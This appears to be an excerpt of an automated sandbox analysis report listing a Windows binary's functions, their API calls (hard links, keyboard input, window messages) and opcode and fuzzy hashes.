                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F412871A00714EFD724AF78DC45BAABBECEB88710F10852AF155DB292D379A94187C0
                                                                                                                                                                                                                                                                              Function 0076611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007661C8
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 007661EE
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00766213
                                                                                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0076623F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8467d52602442dfcdc422307e3cf05f713b204d780f0efedd7d7923c44f34f81
                                                                                                                                                                                                                                                                              • Instruction ID: 19c782c2d342b18875038e84becdbceb8602b07e200d8985af8e639f674b2f2d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8467d52602442dfcdc422307e3cf05f713b204d780f0efedd7d7923c44f34f81
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D412C35600615DFCF65DF14C545A69BBE2FF89720B188488ED4A9B362CB34FD01CB95
                                                                                                                                                                                                                                                                              Function 0075B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0075B473
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0075B48F
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0075B4FD
                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0075B54F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                                                                              • Opcode ID: e3e7eaf792dff516c1fba564f1e1a0fefc5e7658c610e6f5e557db29aa84c65f
                                                                                                                                                                                                                                                                              • Instruction ID: a92e4bcd92f855708d60b7763af16bc0a4f3520695b320f3bef720f43d2d09b8
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3e7eaf792dff516c1fba564f1e1a0fefc5e7658c610e6f5e557db29aa84c65f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03316B70A40248AEFF34CB648805BFA7BB5AF44312F14821AFC95961D2D3FC9D5D8791
                                                                                                                                                                                                                                                                              Function 0075B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0075B5B8
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0075B5D4
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0075B63B
                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0075B68D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                                                                              • Opcode ID: f4a74f7e6ad555d0ae415173b238ad031dd87e8cd0aec9eb3e767ede8ab24fab
                                                                                                                                                                                                                                                                              • Instruction ID: 09577316c1a9605fd68aa983530d6569bda7c107d8c9dd6ae0eca002e531500a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a74f7e6ad555d0ae415173b238ad031dd87e8cd0aec9eb3e767ede8ab24fab
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49313E30E40648AEFF308B6488057FA7BB6EF85312F14822AE881561D1D3FCDE5D8B95
                                                                                                                                                                                                                                                                              Function 007880AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 007880D4
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0078814A
                                                                                                                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 0078815A
                                                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 007881C6
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                              • Opcode ID: 684623e49b25f0b3616a92bd569539586d8183fb4c975de738be2eb5c1ed8da0
                                                                                                                                                                                                                                                                              • Instruction ID: aa30ca992f9872cdf071e9e673e96cecf1f5748637640fc6066fb478428b6f76
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 684623e49b25f0b3616a92bd569539586d8183fb4c975de738be2eb5c1ed8da0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A418030A40219DFCB51DF58C888E69B7F6BF45720F9481ADE9549B261CF78A842CB51
                                                                                                                                                                                                                                                                              Function 00782176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00782187
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 0078219B
                                                                                                                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 007821E8
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 007821EE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                              • Opcode ID: 45fb8e825b64acda0a8205fb622ae7148f252a9b24d58c5296e1589162c27c93
                                                                                                                                                                                                                                                                              • Instruction ID: 2b29d723639bc44704d25884ac7cc4284f22f0b21ff00f978ac47d8074599d78
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45fb8e825b64acda0a8205fb622ae7148f252a9b24d58c5296e1589162c27c93
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D73152B1D0010DAFCB44EFA9C885CEEBBF9EF48304B5084AAE515E7252D7759E45CBA0
                                                                                                                                                                                                                                                                              Function 0075E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E8E2
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E8F9
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E924
                                                                                                                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0075E92F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                              • Opcode ID: 249693392a0823169d24cc2ecbc0d6bce308ed168d0a4b1c594d32b70369dedc
                                                                                                                                                                                                                                                                              • Instruction ID: 61c7118e2fef992a866093315f2521b05c6eff27054139b0d444c5c9f49b6035
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 249693392a0823169d24cc2ecbc0d6bce308ed168d0a4b1c594d32b70369dedc
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D021A875900218EFDB14EFA8D981BEEB7B4EF55350F144065E904AB281D7B8AE4187E1
                                                                                                                                                                                                                                                                              Function 0078321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 007832A6
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007832C0
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007832CE
                                                                                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007832DC
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                              • Opcode ID: ab2cfa07d12c13441aace8ea444f4ce0a13b4a75dc6dd0d3f79a6527ff313e65
                                                                                                                                                                                                                                                                              • Instruction ID: 69b0776da3c7219ea94fd048d391fe579fb35c77abf696b91a9221bb6dc4025f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab2cfa07d12c13441aace8ea444f4ce0a13b4a75dc6dd0d3f79a6527ff313e65
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37210631244115AFD714AB28C845F6A7B95FF81724F24825CF8268B2D2C779ED41C7D4
                                                                                                                                                                                                                                                                              Function 0075825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?), ref: 007596F3
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrcpyW.KERNEL32(00000000,?,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 00759719
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrcmpiW.KERNEL32(00000000,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?), ref: 0075974A
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 0075828A
                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 007582B0
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 007582EB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                              • Opcode ID: ac88a8dad2437ce312ae831333b3ee9a62e44d130017b4d01db28fe84e8c308e
                                                                                                                                                                                                                                                                              • Instruction ID: 51eaba70045023a32d44e5a4b66fcdfe91a3821859002d77f3d2a2a4e9a308b0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac88a8dad2437ce312ae831333b3ee9a62e44d130017b4d01db28fe84e8c308e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D411263A200345EBCB149F38C849EBE77A9FF44751B10802AFD02C7290EFB99845D791
                                                                                                                                                                                                                                                                              Function 007860FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 0078615A
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078616C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00786177
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 007862B5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 455545452-0
                                                                                                                                                                                                                                                                              • Opcode ID: af2991cfedb71c18d7b56fbb7b1ab2eaa0a716e08beafa4c68668b79dbd3c9eb
                                                                                                                                                                                                                                                                              • Instruction ID: 898d5f40cb0228123a4c6980fd410688f6744e8b78391cd98f5a1b83537b6db3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af2991cfedb71c18d7b56fbb7b1ab2eaa0a716e08beafa4c68668b79dbd3c9eb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E119675A80218A6DF20FF648C89EEF77BCEB15754F10412AFA11D5082E77CC941CB65
                                                                                                                                                                                                                                                                              Function 00722079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                                                                                                                                                                                                                                                              • Instruction ID: 86ec1afb86c868197f629652dc7b2c64094ae0536cb3833d2b41f23621ddb1e1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA01A2B264922ABEF63126787CC4F27670DDF413B8B354325B521A11D3DE78CC428564
                                                                                                                                                                                                                                                                              Function 00752374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00752394
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523A6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523BC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523D7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                                                                                                                                                                                                                                                              • Instruction ID: 1800e503520fe194d1a5139d61594c0d27d3481a9f0695a2c60ad9d3fddebda9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F11393A900218FFEF119BA4CD85FDDBB78FB08750F200095EA00B7290D6B56E15DB94
                                                                                                                                                                                                                                                                              Function 0075EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0075EB14
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 0075EB47
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0075EB5D
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0075EB64
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
